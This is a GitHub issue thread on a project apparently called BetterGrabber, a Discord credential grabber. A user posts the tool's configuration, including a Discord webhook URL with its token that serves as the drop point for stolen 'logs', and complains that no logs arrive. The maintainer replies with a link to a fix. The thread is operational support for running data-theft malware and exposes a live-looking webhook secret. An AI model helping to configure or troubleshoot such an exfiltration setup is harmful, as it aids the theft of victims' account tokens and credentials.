### ISSUE TITLE
<Error>

### ISSUE THREAD

**Issue by Leaker-Gang** [HideakiAtsuyo/BetterGrabber#22]
**Config**
```js
  {
    pingOnResult: true,
    webHook: "/api/webhooks/956913441384321065/bUBCCeSSJh5-_p-UaS7t_YCxg7j0JFkLrRvaQJcarcPt8t6O5uh17H5gTwJ03NhnSQBr",
    webhookUsername: "Woah",
    webhookAvatar: "https://media.discordapp.net/attachments/956913424535797823/958578021655257158/934589f3aa2f266b260de8bfeb3ae1ab.jpg?width=478&height=473",

    embedTitle: "Woah",
    embedColor: 0x36393f,

    tts: false
}
```

**Problem**

The problem explanation..

I fill the config but it doesn't send logs I tried to reload it and enable disabled doesn't work Lol

Doesn't send logs lmao

**Comment by HideakiAtsuyo** [comment]
> **Config**
> 
> ```js
>   {
>     pingOnResult: true,
>     webHook: "/api/webhooks/956913441384321065/bUBCCeSSJh5-_p-UaS7t_YCxg7j0JFkLrRvaQJcarcPt8t6O5uh17H5gTwJ03NhnSQBr",
>     webhookUsername: "Woah",
>     webhookAvatar: "https://media.discordapp.net/attachments/956913424535797823/958578021655257158/934589f3aa2f266b260de8bfeb3ae1ab.jpg?width=478&height=473",
> 
>     embedTitle: "Woah",
>     embedColor: 0x36393f,
> 
>     tts: false
> }
> ```
> 
> **Problem**
> 
> The problem explanation..
> 
> I fill the config but it doesn't send logs I tried to reload it and enable disabled doesn't work Lol
> 
> Doesn't send logs lmao

https://github.com/HideakiAtsuyo/BetterGrabber#fix
